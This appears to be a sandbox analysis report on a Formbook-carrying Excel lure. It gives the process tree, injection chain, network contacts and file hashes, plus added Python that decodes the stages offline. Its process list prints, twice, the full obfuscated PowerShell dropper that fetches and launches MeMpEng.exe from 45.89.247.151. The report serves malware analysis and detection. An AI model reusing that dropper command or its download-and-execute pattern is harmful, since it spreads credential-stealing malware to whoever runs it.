Malware Analysis Report

2025-01-18 12:24

Sample ID 240829-b55kcayhpp
Target 29082024_0144_28082024_Nuevo orden agosto.xls
SHA256 b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b
Tags
formbook b48n defense_evasion discovery execution rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

b171b5e7c7abd247edcc25f1c00301e89f1e9715ed6d98f03f4b6a6674c5834b

Threat Level: Known bad

The file 29082024_0144_28082024_Nuevo orden agosto.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Process spawned unexpected child process

Formbook

Formbook payload

Evasion via Device Credential Deployment

Blocklisted process makes network request

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Uses Task Scheduler COM API

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Checks processor information in registry

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-29 01:44

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-29 01:44

Reported

2024-08-29 01:47

Platform

win7-20240729-en

Max time kernel

146s

Max time network

142s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1536 set thread context of 2572 | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2572 set thread context of 1392 (x2) | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Windows\Explorer.EXE
PID 1220 set thread context of 1392 | N/A | C:\Windows\SysWOW64\msdt.exe | C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msdt.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2257386474-3982792636-3902186748-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\msdt.exe | N/A
Token: SeShutdownPrivilege (x2) | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2908 wrote to memory of 3068 (x4) | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2360 (x4) | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2268 (x4) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2268 wrote to memory of 1204 (x4) | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2360 wrote to memory of 1536 (x4) | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 (x7) | N/A | C:\Users\Admin\AppData\Roaming\MeMpEng.exe | C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1392 wrote to memory of 1220 (x4) | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\msdt.exe
PID 1220 wrote to memory of 2796 (x4) | N/A | C:\Windows\SysWOW64\msdt.exe | C:\Windows\SysWOW64\cmd.exe
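The WriteProcessMemory and SetThreadContext tables above describe one chain. A parent writing a few times into a child it has just created is what ordinary process creation looks like in this trace (mshta -> cmd -> powershell -> csc -> cvtres). The seven writes from MeMpEng.exe (PID 1536) into a second copy of itself (PID 2572), followed by SetThreadContext on that same PID, is process hollowing, and the later SetThreadContext calls from 2572 and from msdt.exe (1220) into Explorer.EXE (1392) are Formbook's usual hop into explorer and then into a system binary before the final "cmd /c del" of the dropper. The following Python is an added example, not part of the report or of any sandbox tooling, that parses the de-duplicated rows of both tables, rebuilds the process tree and flags those two injection patterns. The row text and every PID and path are the report's own; the function names are mine.

```python
import re
from collections import defaultdict

# Rows copied from the "Suspicious use of WriteProcessMemory" and "Suspicious use of
# SetThreadContext" tables (behavioral1), with repeated identical rows collapsed.
# Every PID and image path is the sandbox's own; nothing here is invented.
SANDBOX_ROWS = r"""
PID 2908 wrote to memory of 3068 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 3068 wrote to memory of 2360 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2360 wrote to memory of 2268 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2268 wrote to memory of 1204 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2360 wrote to memory of 1536 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1536 wrote to memory of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 1392 wrote to memory of 1220 N/A C:\Windows\Explorer.EXE C:\Windows\SysWOW64\msdt.exe
PID 1220 wrote to memory of 2796 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 set thread context of 2572 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Users\Admin\AppData\Roaming\MeMpEng.exe
PID 2572 set thread context of 1392 N/A C:\Users\Admin\AppData\Roaming\MeMpEng.exe C:\Windows\Explorer.EXE
PID 1220 set thread context of 1392 N/A C:\Windows\SysWOW64\msdt.exe C:\Windows\Explorer.EXE
"""

# One table row: "PID <src> <op> <dst> N/A <src image> <dst image>". Image paths may
# contain spaces, so each path is matched lazily up to its own ".exe" (any case).
ROW_RE = re.compile(
    r"^PID (?P<src>\d+) (?P<op>wrote to memory of|set thread context of) (?P<dst>\d+) "
    r"N/A (?P<src_img>.+?\.exe) (?P<dst_img>.+?\.exe)$",
    re.IGNORECASE,
)


def parse_rows(text):
    """Return a list of (src_pid, op, dst_pid, src_image, dst_image) tuples."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        rows.append((int(m["src"]), m["op"].lower(), int(m["dst"]), m["src_img"], m["dst_img"]))
    return rows


def build_graph(rows):
    """images: pid -> image path; wpm: writer pid -> [written pids] in first-seen order;
    ctx: set of (caller pid, target pid) pairs for SetThreadContext."""
    images, wpm, ctx = {}, defaultdict(list), set()
    for src, op, dst, src_img, dst_img in rows:
        images[src], images[dst] = src_img, dst_img
        if op.startswith("wrote"):
            if dst not in wpm[src]:
                wpm[src].append(dst)
        else:
            ctx.add((src, dst))
    return images, wpm, ctx


def hollowing_candidates(wpm, ctx):
    """WriteProcessMemory plus SetThreadContext from the same caller into the same
    target: the process-hollowing / thread-hijack signature (ATT&CK T1055.012)."""
    return sorted((s, d) for (s, d) in ctx if d in wpm.get(s, []))


def foreign_image_hijacks(images, ctx):
    """SetThreadContext on a process running a different image than the caller
    (here MeMpEng.exe and msdt.exe each redirecting a thread inside Explorer.EXE)."""
    return sorted((s, d) for (s, d) in ctx if images[s].lower() != images[d].lower())


def lineage(wpm, root):
    """Depth-first PID order reachable from root over WriteProcessMemory edges. Since a
    parent writes into each child it creates, this doubles as the process tree."""
    order = []

    def walk(pid):
        order.append(pid)
        for child in wpm.get(pid, []):
            if child not in order:
                walk(child)

    walk(root)
    return order


if __name__ == "__main__":
    images, wpm, ctx = build_graph(parse_rows(SANDBOX_ROWS))
    for root in (2908, 1392):  # the mshta.exe chain, and the Explorer.EXE chain it hops into
        print(" -> ".join(f"{pid} ({images[pid].rsplit(chr(92), 1)[-1]})" for pid in lineage(wpm, root)))
    print("hollowing candidates:", hollowing_candidates(wpm, ctx))
    print("thread hijacks into another image:", foreign_image_hijacks(images, ctx))
```

Run as-is it prints the two chains (2908 -> 3068 -> 2360 -> 2268 -> 1204 -> 1536 -> 2572 and 1392 -> 1220 -> 2796), reports (1536, 2572) as the only pair with both a memory write and a thread-context change, and lists (1220, 1392) and (2572, 1392) as thread hijacks into a foreign image. The same parser works on any report of this layout; only the row text changes.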

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\29082024_0144_28082024_Nuevo orden agosto.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'[same Base64 payload as in the cmd.exe command line above]'+[chaR]0X22+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Users\Admin\AppData\Roaming\MeMpEng.exe

"C:\Users\Admin\AppData\Roaming\MeMpEng.exe"

C:\Windows\SysWOW64\msdt.exe

"C:\Windows\SysWOW64\msdt.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MeMpEng.exe"
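The cmd.exe command line in the process list above is the whole first stage. PowerShell is launched with -EX (ExecutionPolicy) Bypass, -nOP (NoProfile) and -W 1 (WindowStyle Hidden); the first statement, the bare token dEviceCrEdeNtIalDePLOyMENT that the sandbox reports as "Evasion via Device Credential Deployment", is not a command and only produces a non-terminating error, so execution continues at the iex after the semicolon. There, a string assembled from quoted fragments and [char] casts is evaluated twice: the inner iEX yields a FromBase64String call, and the outer iex runs what that decodes to. The csc.exe and cvtres.exe children are Add-Type compiling the P/Invoke stub the decoded script declares. The following Python is an added example, not code from the report or from the sandbox, that reverses those steps offline on the command line copied from this report and pulls out the download URL, the drop path and the native API used. Function names are mine.

```python
import base64
import re

# The "/C ..." argument from the cmd.exe entry in the process list above, copied
# verbatim from this report (only the trailing quote that cmd.exe appended is dropped).
OBFUSCATED = r"""powErShElL -EX byPasS -nOP -W 1 -c dEviceCrEdeNtIalDePLOyMENT ; iex($(iEX('[systeM.text.encodIng]'+[ChAR]58+[ChAR]0x3A+'uTf8.gETstRiNg([sYSTEM.cONveRt]'+[chAR]0x3a+[ChAR]58+'froMBasE64strINg('+[cHAr]34+'JE5JTWhGTFlIRk4gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYmVSRGVGaW5pdElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNY2lwcWpxLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIS0Qsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhWLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUlFtcUlSVXV6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuR29iUFF4dCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3lNbG9uUVIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGh2Y3lnR21Ma28gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkTklNaEZMWUhGTjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzQ1Ljg5LjI0Ny4xNTEvNDU4L01lTXBFbmcuZXhlIiwiJGVuVjpBUFBEQVRBXE1lTXBFbmcuZXhlIiwwLDApO1NUQXJ0LVNMZWVQKDMpO1N0YXJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcTWVNcEVuZy5leGUi'+[chaR]0X22+'))')))"""

# A quoted fragment or a [char]N cast (decimal or hex), in the order PowerShell's
# "+" operator concatenates them.
FRAG_RE = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|\d+)", re.IGNORECASE)
B64_RE = re.compile(r'FromBase64String\("([A-Za-z0-9+/=]+)"\)', re.IGNORECASE)
WINDOW_STYLES = {"0": "Normal", "1": "Hidden", "2": "Minimized", "3": "Maximized"}


def launcher_flags(cmd):
    """Resolve the abbreviated powershell.exe switches (-EX, -nOP, -W 1) to their names."""
    toks = cmd.split()
    flags = {}
    for i, t in enumerate(toks):
        tl = t.lower()
        if tl in ("-ex", "-executionpolicy") and i + 1 < len(toks):
            flags["ExecutionPolicy"] = toks[i + 1]
        elif tl in ("-nop", "-noprofile"):
            flags["NoProfile"] = True
        elif tl in ("-w", "-windowstyle") and i + 1 < len(toks):
            flags["WindowStyle"] = WINDOW_STYLES.get(toks[i + 1], toks[i + 1])
    return flags


def rebuild_concatenation(cmd):
    """Stage 1: join the 'str'+[char]N+'str' pieces inside iex(...) into the string
    that the inner iEX evaluates."""
    inner = cmd[cmd.lower().index("iex("):]
    parts = []
    for m in FRAG_RE.finditer(inner):
        parts.append(m.group(1) if m.group(1) is not None else chr(int(m.group(2), 0)))
    return "".join(parts)


def decode_payload(stage1):
    """Stage 2: take the argument of FromBase64String("...") and decode it. The payload
    pads every token with long runs of spaces, so whitespace is collapsed for reading."""
    m = B64_RE.search(stage1)
    if m is None:
        raise ValueError("no FromBase64String(...) call found")
    script = base64.b64decode(m.group(1), validate=True).decode("utf-8")
    return re.sub(r"\s+", " ", script).strip()


def extract_iocs(script):
    """URLs, drop paths and the native API the decoded script relies on."""
    paths = re.findall(r'\$env:[A-Za-z]+\\[^\s"]+', script, re.IGNORECASE)
    return {
        "urls": re.findall(r'https?://[^\s"]+', script),
        "drop_paths": sorted({p.lower() for p in paths}),
        "apis": sorted(set(re.findall(r"\b(DllImport|URLDownloadToFile)\b", script))),
    }


def analyze(cmd):
    stage1 = rebuild_concatenation(cmd)
    script = decode_payload(stage1)
    return {"flags": launcher_flags(cmd), "stage1": stage1, "script": script, "iocs": extract_iocs(script)}


if __name__ == "__main__":
    result = analyze(OBFUSCATED)
    print("launcher flags:", result["flags"])
    print("stage 1:", result["stage1"][:90], "...")
    print("decoded script:", result["script"])
    print("IOCs:", result["iocs"])
```

The decoded script declares urlmon!URLDownloadToFile through Add-Type -MemberDefinition, fetches http://45.89.247.151/458/MeMpEng.exe into $env:APPDATA\MeMpEng.exe, sleeps three seconds and starts it, which matches the 45.89.247.151:80 connections in the Network table and the MeMpEng.exe entry under Files. The [char] casts and the case-mangled cmdlet names defeat simple string matching on "FromBase64String" in the command line, which is why decoding should be done on the concatenated result rather than on the raw argument.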

Network

Country Destination Domain Proto
US 8.8.8.8:53 zhort.de udp
DE 88.99.66.38:443 zhort.de tcp
US 8.8.8.8:53 e6.o.lencr.org udp
GB 92.123.143.218:80 e6.o.lencr.org tcp
NL 45.89.247.151:80 45.89.247.151 tcp
DE 88.99.66.38:443 zhort.de tcp
NL 45.89.247.151:80 45.89.247.151 tcp
NL 45.89.247.151:80 45.89.247.151 tcp
US 8.8.8.8:53 www.5sawit777.pro udp
SG 172.96.191.238:80 www.5sawit777.pro tcp
US 8.8.8.8:53 www.5sawit777.pro udp
SG 172.96.191.238:80 www.5sawit777.pro tcp
US 8.8.8.8:53 www.5ldym2.shop udp
US 8.8.8.8:53 www.lubfitgrowth.xyz udp
US 8.8.8.8:53 www.itesmiledl.net udp
US 8.8.8.8:53 www.xrduxsd220.xyz udp

Files

memory/3040-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/3040-1-0x000000007208D000-0x0000000072098000-memory.dmp

memory/2908-18-0x0000000002C20000-0x0000000002C22000-memory.dmp

memory/3040-19-0x0000000002EB0000-0x0000000002EB2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 f9566984e5f964d900d054591e995128
SHA1 d319131809626aa276df82dcca849ad0ff0c048f
SHA256 7e4c57c0eb315d2069e8adbb705c282efff0355d659194f55f9264bb356c593d
SHA512 61cd10b3da03b7f737db7e3e95cc69a13429e879d3a3508d14b5aa0643fbf9b48265865c48b18761009edf73cc3a5fbd6a6ba7570de03dec541bf769ac9b9746

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 d38582100e02b55c52f0abf17f341af4
SHA1 84b215051a94357b63b4cfb5eaff4cdb33882440
SHA256 a8f00a3577f30d397672d1a4ee31571f638dc9cd4b4e46c4510714dd765b2c03
SHA512 0a0d97c3873388c13efcb5ef2b370cabf07ffb2466c9e2d50fb2c4189cb3786621232963cc70126a04483e91e8c907cc6f2e74e37de11252161064338c0a1c16

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\Local\Temp\Cab37C3.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 926df9f09fc03fc48bc375b94a59ac53
SHA1 8cbf5ed6a69d5bfa85e751f0bc6d652e68147fec
SHA256 1f62c69cf106a48f05344730b0c807e08b84794393a16920710de35dccd5fe1e
SHA512 971ac7dc7b532b10344f7f919140a81b42dd8a860c215288f2fb659ffe776683284b67ac587193fca841af904429f4ad631a516b3f06a2514c38ba387fa8da85

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6GL24G53\IEnetworthUpdated[1].hta

MD5 87635cf66104074c53e698677de6002b
SHA1 958ba282403c968f0dc8631aa396b8a73612ffe3
SHA256 4768f32e03962166a83fab45ea2e5865291e66bff359c547573ca34da6fe78cf
SHA512 7976b9820a1494953d6b99982e696a9faed599bc8ec932e92285ab10eb5db8d6ff76794309d062c8e8410e1142d06f75a70c417ea646e0adb5b42a2c55a3e31d

\??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.cmdline

MD5 eac48470226ecca10dd0ca11d529d8f7
SHA1 f0b5b6b50c4c7a152e65ec87dddd105536f6ca56
SHA256 0feda6d4d2b05ecdde385be444c2544de93e53d5836e3b337306ab61ea597f36
SHA512 b663dd3ee88541e1d474ee82ea386bfa2dbf9090ae4158cc011003162444af588d60142cc0edad414950ed4f51a16be49cf2512386e61387946f2947361ef2fd

\??\c:\Users\Admin\AppData\Local\Temp\tzdsmlu7.0.cs

MD5 f2a64cd1f09c060d9412d84239f92021
SHA1 8053849b3e79d63181b74207b19e76775a248982
SHA256 2f6ec9f074eca2e37185fbec988ed8bd98be664feeec718f77cc489413ddd1d7
SHA512 f7661e45c4752e6457741d1bd753e25e1b624fd0c85062b74c0a8d0334c4b7a7fb4ef58295b31607ad427b08d8b87b730025b33fbd3b60041af83e29dbb95513

C:\Users\Admin\AppData\Local\Temp\RES3CF2.tmp

MD5 d999f5d2dfe120849537621c9b7f2e81
SHA1 3e64d1fcd139df85d0e71ef83dee9028b88ea63b
SHA256 4da1badd97443afba14ebd96c8d76b4d2e7acddf45cc0d2c8d77b8efae3bee67
SHA512 e82a11e09794773f316c1944e248410d830547c1d8cc13ec4b616ef86b9d40efdcdd581d8d53649c054ff1cd8676dae83395d08b50425b2b316c2dc6b4763e1b

\??\c:\Users\Admin\AppData\Local\Temp\CSC3CF1.tmp

MD5 cf5a364d75ec01854a552bb49dd20640
SHA1 24b28726b5255edafcfb8974c42b1f0e4fde4706
SHA256 940be207b263540c536e5ca6cca04f9975a6593630d3e22f98c80bc46952a23f
SHA512 2fdde78b5485bb3aa2fb44c7d8787696682d6a8d9096eb09f9ec89cb5216e4e5bf2cb094447ebdc3ae1f923f32a629965e8e9e85d0a119ae9839a8ba9321ab68

C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.dll

MD5 7bca2684abcbdd567785c28658cc7395
SHA1 2d5d6d3e4ee1033afd0b3f4cb869f8b212a92cba
SHA256 1dba6147e1ea9f4e64e699f5775348fc020e5a22f14780ee527ca9c7a04fea2d
SHA512 ba4e3a102e5801654e5333859e27bd308c8fc242da4e420528845939bb2cd47db7c00a78a996961a775ba7d81058510b1e3123cd7c7ac2f8fa094a1388171f89

C:\Users\Admin\AppData\Local\Temp\tzdsmlu7.pdb

MD5 c44a3ca81090c6eb4168f2baa4c647a4
